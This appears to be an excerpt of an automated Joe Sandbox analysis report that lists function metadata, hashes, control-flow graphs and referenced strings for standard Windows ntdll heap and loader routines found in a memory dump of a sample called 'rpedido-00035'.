                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: e4533953321ea0fbfa892306b5c2435821eca62bb429867d522d5de9a211aad6
                                                          • Instruction ID: 72da34597c1bae0e2ae6aab93c3cea57ccf2bf52c2bd962566f94174bc7a7624
                                                          • Opcode Fuzzy Hash: e4533953321ea0fbfa892306b5c2435821eca62bb429867d522d5de9a211aad6
                                                          • Instruction Fuzzy Hash: 7251E1B59043519BD721CF15CD82AABBBE8FF84354F40899DFA5983160E770D644CB92
                                                          Function 360BF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1501 360bf0a5-360bf0c7 call 36067be4 1504 360bf0c9-360bf0de RtlDebugPrintTimes 1501->1504 1505 360bf0e3-360bf0fb call 36007662 1501->1505 1509 360bf3e7-360bf3f6 1504->1509 1510 360bf3d2 1505->1510 1511 360bf101-360bf11c 1505->1511 1512 360bf3d5-360bf3e4 call 360bf3f9 1510->1512 1513 360bf11e 1511->1513 1514 360bf125-360bf137 1511->1514 1512->1509 1513->1514 1516 360bf139-360bf13b 1514->1516 1517 360bf13c-360bf144 1514->1517 1516->1517 1518 360bf14a-360bf14d 1517->1518 1519 360bf350-360bf359 GetPEB 1517->1519 1518->1519 1521 360bf153-360bf156 1518->1521 1522 360bf35b-360bf376 GetPEB call 3600b910 1519->1522 1523 360bf378-360bf37d call 3600b910 1519->1523 1525 360bf158-360bf170 call 3601fed0 1521->1525 1526 360bf173-360bf196 call 360c0835 call 36025d90 call 360c0d24 1521->1526 1528 360bf382-360bf396 call 3600b910 1522->1528 1523->1528 1525->1526 1526->1512 1540 360bf19c-360bf1a3 1526->1540 1528->1510 1541 360bf1ae-360bf1b6 1540->1541 1542 360bf1a5-360bf1ac 1540->1542 1543 360bf1b8-360bf1c8 1541->1543 1544 360bf1d4-360bf1d8 1541->1544 1542->1541 1543->1544 1545 360bf1ca-360bf1cf call 360cd646 1543->1545 1546 360bf1da-360bf1ed call 36043ae9 1544->1546 1547 360bf208-360bf20e 1544->1547 1545->1544 1554 360bf1ff 1546->1554 1555 360bf1ef-360bf1fd call 3603fdb9 1546->1555 1550 360bf211-360bf21b 1547->1550 1552 360bf22f-360bf236 1550->1552 1553 360bf21d-360bf22d 1550->1553 1556 360bf238-360bf23c call 360c0835 1552->1556 1557 360bf241-360bf250 GetPEB 1552->1557 1553->1552 1562 360bf202-360bf206 1554->1562 1555->1562 1556->1557 1559 360bf2be-360bf2c9 1557->1559 1560 360bf252-360bf255 1557->1560 1559->1512 1566 360bf2cf-360bf2d5 1559->1566 1563 360bf257-360bf272 GetPEB call 3600b910 1560->1563 1564 360bf274-360bf279 call 3600b910 1560->1564 1562->1550 1572 360bf27e-360bf292 call 3600b910 1563->1572 1564->1572 1566->1512 1569 360bf2db-360bf2e2 1566->1569 1569->1512 1570 360bf2e8-360bf2f3 1569->1570 1570->1512 1573 360bf2f9-360bf302 GetPEB 1570->1573 1580 360bf295-360bf29f GetPEB 1572->1580 1575 360bf321-360bf326 call 3600b910 1573->1575 1576 360bf304-360bf31f GetPEB call 3600b910 1573->1576 1582 360bf32b-360bf34b call 360b823a call 3600b910 1575->1582 1576->1582 1580->1512 1583 360bf2a5-360bf2b9 1580->1583 1582->1580 1583->1512
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                          • API String ID: 3446177414-1745908468
                                                          • Opcode ID: 784cdd2cb3b13da34be01e351d09af4e6c0f5c9d0613a8e9545ce858ff05a26f
                                                          • Instruction ID: 027ecf6f4dfa49cd20d10598c329ac5a4a2acf4930f4b9503daa84b93fec532a
                                                          • Opcode Fuzzy Hash: 784cdd2cb3b13da34be01e351d09af4e6c0f5c9d0613a8e9545ce858ff05a26f
                                                          • Instruction Fuzzy Hash: BC91DC79900645DFEF02CFA9C842AADBFF2FF49714F148899E441AB251CB36D941CB52
                                                          Function 3600640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDebugPrintTimes.NTDLL ref: 3600651C
                                                            • Part of subcall function 36006565: RtlDebugPrintTimes.NTDLL ref: 36006614
                                                            • Part of subcall function 36006565: RtlDebugPrintTimes.NTDLL ref: 3600665F
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 360697B9
                                                          • LdrpInitShimEngine, xrefs: 36069783, 36069796, 360697BF
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3606977C
                                                          • apphelp.dll, xrefs: 36006446
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 360697A0, 360697C9
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36069790
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-204845295
                                                          • Opcode ID: 78c7245cc4f3d5a71cd053a5eaef7ea1475d9544b4a9161fda5ce0fe640931e5
                                                          • Instruction ID: 08abbb99d1203f7cf5a01629495c8ffdf90e585817ed2bcb30ede4d22cf75805
                                                          • Opcode Fuzzy Hash: 78c7245cc4f3d5a71cd053a5eaef7ea1475d9544b4a9161fda5ce0fe640931e5
                                                          • Instruction Fuzzy Hash: AC51DE716183019FE710CF21CD92A9FBBE9EF84348F40099AF684A7561DA31DA58CB93
                                                          Function 3600D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                          • API String ID: 0-3532704233
                                                          • Opcode ID: a754b2e4d6beffb438be86a0fe3dc78788acf009d19d28a83d20186f6898ae8b
                                                          • Instruction ID: 667b6b28a8925181f7f7ad7ca74ec1d8da97f9c4341539108f0d543f62883206
                                                          • Opcode Fuzzy Hash: a754b2e4d6beffb438be86a0fe3dc78788acf009d19d28a83d20186f6898ae8b
                                                          • Instruction Fuzzy Hash: 36B1CEB59083519FE311CF19C842A5FBBE8EF84758F4149AEF994A7280D770D948CFA2
                                                          Function 3603D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDebugPrintTimes.NTDLL ref: 3603D879
                                                            • Part of subcall function 36014779: RtlDebugPrintTimes.NTDLL ref: 36014817
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-1975516107
                                                          • Opcode ID: 0b586b2d6c399ee456d6a735cc59238155dfa39ae7e156ab98b459e5d2dbeae4
                                                          • Instruction ID: 607257abed90b86b457d08e9f1c639cbf322f436c3b9013af90a6abcbe4b1c9c
                                                          • Opcode Fuzzy Hash: 0b586b2d6c399ee456d6a735cc59238155dfa39ae7e156ab98b459e5d2dbeae4
                                                          • Instruction Fuzzy Hash: 6751CCB5E053459FEB04CFA4CA8678DBFF2BF44318F204099D5206B2C1E770A99ACB90
                                                          Function 3600D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3600D136
                                                          • @, xrefs: 3600D24F
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3600D263
                                                          • @, xrefs: 3600D2B3
                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3600D202
                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3600D0E6
                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3600D06F
                                                          • @, xrefs: 3600D09D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                          • API String ID: 0-1356375266
                                                          • Opcode ID: d6054492474f13cc3da3befd55a5ecc970cbcfc68adcab6bd5e47441af489cce
                                                          • Instruction ID: 9de9c9675dc2776ea6bfb8e197385004b6e4957cb1e3d8a7c697d0da4a0a93ba
                                                          • Opcode Fuzzy Hash: d6054492474f13cc3da3befd55a5ecc970cbcfc68adcab6bd5e47441af489cce
                                                          • Instruction Fuzzy Hash: 75A17EB19083059FE321CF11C941B9FBBE8AF84759F11496EF69896280DB74D948CFA3
                                                          Function 360BF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                          • API String ID: 0-2224505338
                                                          • Opcode ID: 9744f222ef92ebde2ef72594db01638bf9eadc5163c07e67da84a3886e763449
                                                          • Instruction ID: 5e0c6bbcfcafea2109034e6d517f1a565c17aaa1ed842f282dba81cfd8b97c32
                                                          • Opcode Fuzzy Hash: 9744f222ef92ebde2ef72594db01638bf9eadc5163c07e67da84a3886e763449
                                                          • Instruction Fuzzy Hash: 8851E336911245EFEB01CFA8C986E6ABFF4EF04668F11C8D9F9019B211CA36D990CE55
                                                          Function 36098633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • VerifierDlls, xrefs: 3609893D
                                                          • VerifierFlags, xrefs: 360988D0
                                                          • HandleTraces, xrefs: 3609890F
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 360986E7
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 360986BD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 3609880F
                                                          • VerifierDebug, xrefs: 36098925
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: 53ea9276b4aadef3f01518202a96526f487cd16cba98d066aced72b0b6b8756b
                                                          • Instruction ID: 5d56f66d3455bc77929d7c631e93a8de6afd5b5e395d0e8243cf9ed6f8c17ea9
                                                          • Opcode Fuzzy Hash: 53ea9276b4aadef3f01518202a96526f487cd16cba98d066aced72b0b6b8756b
                                                          • Instruction Fuzzy Hash: 5F9102B19047119FEB11DB258E82B9ABFEAEB44714F454CD9FA406B360C730D809DBA2
                                                          Function 3603237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3607A79F
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3607A7AF
                                                          • apphelp.dll, xrefs: 36032382
                                                          • LdrpDynamicShimModule, xrefs: 3607A7A5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: 479089f7d79a13db89a4ae0ce07ec47fd63bcb3e8bc7062a255697aeddbd8cf5
                                                          • Instruction ID: d44c9b558f19652a74dad22409b58aee7dd0ef37d685ad3451ffe66f4c9c98e9
                                                          • Opcode Fuzzy Hash: 479089f7d79a13db89a4ae0ce07ec47fd63bcb3e8bc7062a255697aeddbd8cf5
                                                          • Instruction Fuzzy Hash: 10312576E10201EBFB009F19CC82A5E7FF6FF80750F2000DAEA00B7251DAB19966CB91
                                                          Function 3602B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-122214566
                                                          • Opcode ID: b0541ee4ff828c35a4014095eb200766cb3a9f3a17cb5e11aff33599b58dc9d1
                                                          • Instruction ID: baf52d57124e05ecdd2ab77c534c57a39bd5c38b0b07c7a637827b0c4349ab2e
                                                          • Opcode Fuzzy Hash: b0541ee4ff828c35a4014095eb200766cb3a9f3a17cb5e11aff33599b58dc9d1
                                                          • Instruction Fuzzy Hash: 19C126B5E003259FEB148B65CC93B7EBFB5AF45308F9440E9E901AB290DB749C89C391
                                                          Function 3604631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 82ddeec13ee659b47cabb7dca6885b3ed917af8e0df6c783f2a9ba1d8a9912d6
                                                          • Instruction ID: 1eec8632d6b844aca0c68e2006d0be178be01ab90264ea0a0dab617edd811f74
                                                          • Opcode Fuzzy Hash: 82ddeec13ee659b47cabb7dca6885b3ed917af8e0df6c783f2a9ba1d8a9912d6
                                                          • Instruction Fuzzy Hash: 889125B1E10365DBEB25DF60CD46B9E7FA2AB40754F1000E9E6057B291EB709851CFE2
                                                          Function 36042594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 36081FA9
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 36081FC9
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 36081F8A
                                                          • SXS: %s() passed the empty activation context, xrefs: 36081F6F
                                                          • RtlGetAssemblyStorageRoot, xrefs: 36081F6A, 36081FA4, 36081FC4
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 36081F82
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: f3cf8ed0193788290a42af95b19310c32c76cff69c99dcbce45a7f6ef5957147
                                                          • Instruction ID: 07671ba2b388a78108940696c968ce6bcadc9cd75ce568808148a1b8fa35d764
                                                          • Opcode Fuzzy Hash: f3cf8ed0193788290a42af95b19310c32c76cff69c99dcbce45a7f6ef5957147
                                                          • Instruction Fuzzy Hash: A8310576F01225BBF7219A87EC42F5BBFA99F50694F0105E9F90067251C730EE40CAE9
                                                          Function 3604C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 36087F8C, 36088000
                                                          • LdrpInitializeProcess, xrefs: 3604C5E4
                                                          • Loading import redirection DLL: '%wZ', xrefs: 36087F7B
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3604C5E3
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 36087FF0
                                                          • LdrpInitializeImportRedirection, xrefs: 36087F82, 36087FF6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: ed24d0305e83756a92376ce6a3e162ac9c9e934dd62796b5cc456d22a95ccb05
                                                          • Instruction ID: 308b62f731efb90d4356d94547993607a1f0413d526cf093be7318f3023b3df1
                                                          • Opcode Fuzzy Hash: ed24d0305e83756a92376ce6a3e162ac9c9e934dd62796b5cc456d22a95ccb05
                                                          • Instruction Fuzzy Hash: D131E2B16053029BD214EF29DD46E1EBFD5EF85750F0109E8F984AB291D620DC09CBA3
                                                          Function 36020680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: df5201fdbf031d556132e4534868138e5d851df92fa69f74a632a8aa8f6a2ec1
                                                          • Instruction ID: 230b8880fdb2e56515054dace6dfd11e03bfd09134f8816658c4823a676f88ab
                                                          • Opcode Fuzzy Hash: df5201fdbf031d556132e4534868138e5d851df92fa69f74a632a8aa8f6a2ec1
                                                          • Instruction Fuzzy Hash: CFF19D74A00705DFEB05CF69CA86B6ABBF5FF44344F2085D9E4469B281DB30E981CBA1
                                                          Function 36039723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 3446177414-2283098728
                                                          • Opcode ID: 6d8e45055619d9a9554dfa3afbcd87d3fe4c06449de62a4a0f0e328bfc323765
                                                          • Instruction ID: 0ac9054b945674bc5efb6cecffffa3a943b726515d420945b55f906df139632e
                                                          • Opcode Fuzzy Hash: 6d8e45055619d9a9554dfa3afbcd87d3fe4c06449de62a4a0f0e328bfc323765
                                                          • Instruction Fuzzy Hash: 7E51EF75A123019FE710DF38C986A1A7FE1BF84315F200AEDE592972D1FB70A855CB92
                                                          Function 3604C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 360880E9
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 360880F3
                                                          • Failed to reallocate the system dirs string !, xrefs: 360880E2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-1783798831
                                                          • Opcode ID: f571c7e413bd9fb81796cd5524ec4a7164300d84de12358ae7371aca3eff9948
                                                          • Instruction ID: 8e1a294604fff019c789348067bb5d63d0babc6958c8e6e913be3d4934039742
                                                          • Opcode Fuzzy Hash: f571c7e413bd9fb81796cd5524ec4a7164300d84de12358ae7371aca3eff9948
                                                          • Instruction Fuzzy Hash: 9F4128B5911300ABDB21EF64CD42B5B3FE9AF45350F1058BAFA58A3250DB30D815CF92
                                                          Function 360943D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 36094519
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36094508
                                                          • LdrpCheckRedirection, xrefs: 3609450F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
